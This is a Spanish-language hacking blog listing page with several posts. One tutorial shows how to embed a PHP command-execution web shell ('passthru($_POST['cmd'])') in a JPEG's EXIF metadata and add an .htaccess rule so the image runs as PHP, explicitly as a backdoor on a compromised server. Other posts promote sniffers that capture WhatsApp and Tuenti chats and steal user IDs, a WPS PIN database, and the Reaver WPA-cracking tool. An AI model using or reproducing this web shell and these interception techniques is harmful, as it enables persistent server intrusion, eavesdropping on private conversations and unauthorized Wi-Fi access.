Mostrando entradas con la etiqueta herramienta. Mostrar todas las entradas
Mostrando entradas con la etiqueta herramienta. Mostrar todas las entradas

viernes, 22 de febrero de 2013

[WPSdb] Base de datos de pines WPS


WPSdb es un sitio que recauda información interesante sobre pines de WPS (Wifi Protected Setup) de redes WIFI, creando una base de datos accesible para cualquier usuario. Puedes realizar busquedas según la dirección MAC, agregar más pines, etc. Actualmente hay mas de 500 pines disponibles en la base de datos y todos de acceso libre.

Screenshots:

Enlace al sitio:
WPSdb

Más informacion sobre WPS:

+Info

jueves, 19 de abril de 2012

Ocultando codigo PHP en los metadatos de un JPG

Resulta sencillo usar los metadatos EXIF de una imagen JPEG para ocultar código PHP, por ejemplo para dejar un backdoor en la imagen de nuestro avatar en un servidor ya comprometido.


Existen varias herramientas para manipular los metadatos EXIF. Entre todos ellos una de las mejores herramientas para esto es jhead. Para empezar seleccionamos nuestra imagen JPG y miramos sus metadatos con jhead:

C:\>jhead h33z.jpg
File name    : h33z.jpg
File size    : 71384 bytes
File date    : 2012:04:17 14:31:40
Resolution   : 492 x 369
Para insertar nuestro código PHP introducimos:

C:\>jhead -ce h33z.jpg

A continuación se introduce el código PHP que queramos ocultar como por ejemplo:

  • "<?php passthru($_POST['cmd']); __halt_compiler();" -> El cual nos permite ejecutar un comando a la maquina con peticiones POST gracias a la funcion passthru.
Una vez que hemos ocultado el código en la imagen, tendremos que forzar que el servidor web maneje un fichero jpg como si fuera un fichero php. Para ello añadiremos AddType en el fichero .htaccess del directorio de las imágenes. Como ejemplo:

C:\>echo AddType application/x-httpd-php .jpg >> d:\htdocs\server\images\.htaccess

Una vez hecho esto tendremos nuestra imagen ejecutando el código PHP sin problemas.
Esta técnica serviría en un servidor ya comprometido en el cual pudiéramos modificar el fichero .htaccess para que  nuestro JPG ejecutara código.

Enlace de descarga jhead: http://www.sentex.net/~mwandel/jhead/

sábado, 25 de febrero de 2012

Sniffers para Whatsapp y Tuenti Chat

Aquí os dejo dos herramientas mas o menos recientes que actúan como sniffer para captar los datos enviados por estas dos aplicaciones ya que utilizan el mismo protocolo XMPP (una tecnología de comunicación en tiempo real muy potente y utilizada actualmente) y envían todo bajo texto plano...


Tuenti Chat - Tuenti Sniffer

El chat de tuenti usa el protocolo XMPP, una potente y actual tecnología de comunicación en tiempo real muy extendida y usada en WhatsApp (aunque este usa una modificación de xmpp realmente). Cuando nos conectamos, tuenti asigna de forma aleatoria un servidor situado de 1 a 9 quedando por ejemplo xmpp1.tuenti.com.

Los mensajes enviados no van en cifrados, de modo que cualquier persona puede leerlos, obtener el userid que corresponde a que personas envían los mensajes y a que personas los reciben, y más.

Tuenti Sniffer es capaz de leer las conversaciones de tuenti que pasen por la red local.
Y es capaz también de suplantar o robar su ID y capturar los datos enviados durante la conversación en el chat de tuenti.

-Enlace para la descarga: 
(*es necesario tener instalado Java 6 JRE y la librería JPCap 0.7)



Whatsapp - Whatsapp Sniffer

Whatsapp es un servicio de mensajería instantánea disponible para cualquier smartphone actual y que usa el protocolo xmpp para la transmisión de datos. Whatsapp tiene como destino el puerto 443(HTTPS) aunque todo viaja bajo texto plano. Los datos de XMPP son enviados a bin-short.whatsapp.net bajo el puerto 5222.

WhatsAppSniffer que muestra en consola todas las conversaciones, identificadores y demás que pasan por la red cuando se está usando whatsapp. Una forma mucho mas cómoda y fácil de obtener estos datos que usando otros sniffers como wireshark.





martes, 21 de febrero de 2012

Reaver: herramienta para hackear redes wifi protegidas con WEP y WPA/WPA2 PSK mediante WPS (WiFi Protected Setup)

Hay muchas herramientas y formas de crackear redes Wifi, pero una de las formas mas efectivas contra redes WPA/WPA 2 es utilizando este programa que aprovecha la característica WPS (WiFi Protected Setup) la cual permite a los usuarios introducir un PIN de 8 dígitos para conectarse a una red segura sin tener que introducir una contraseña. Reaver implementa un ataque de fuerza bruta contra el WPS a fin de recuperar contraseñas WPA/WPA2 obteniendo el PIN para luego extraer el PSK. Reaver ha sido diseñado para ser un ataque sólido y práctico contra la WPS, y ha sido probado contra una amplia variedad de puntos de acceso e implementaciones del WPS. 

En promedio con Reaver se tendrá acceso a WPA/WPA2 en unas 4 a 10 horas, dependiendo de la de la señal Wifi. También hay que destacar que el 95% de los routers traen por defecto activado el WPS.

 -Video de demostración con Reaver:

- Mas información sobre WPS:
 http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf

- Descarga:
  http://code.google.com/p/reaver-wps/